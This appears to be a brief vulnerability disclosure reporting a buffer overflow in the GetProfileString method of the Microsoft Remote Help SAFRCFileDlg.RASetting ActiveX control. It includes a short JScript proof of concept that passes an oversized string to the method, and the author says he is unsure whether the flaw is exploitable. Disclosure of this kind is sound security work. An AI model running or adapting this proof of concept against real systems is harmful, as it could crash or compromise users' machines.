The Microsoft Remote Help safrcdlg.dll appears to suffer from a buffer overflow vulnerability.
71d4938bb6302ee62a8b14c16dcadbe694f250a46f0bc7d9ace59ae272d3c17d
The GetProfileString function of the SAFRCFileDlg.RASetting control contains a buffer overflow. This control is NOT marked safe for scripting, and seems to execute in the context of the user, so I am not sure what can be done maliciously with this. Never the less, it is a buffer overflow. PoC as follows:
------------------
//written by e.b.
var s = "AAAA";
while (s.length < 999 * 999) s=s+s;
var obj = new ActiveXObject("SAFRCFileDlg.RASetting");
obj.GetProfileString(s);
------------------
Elazar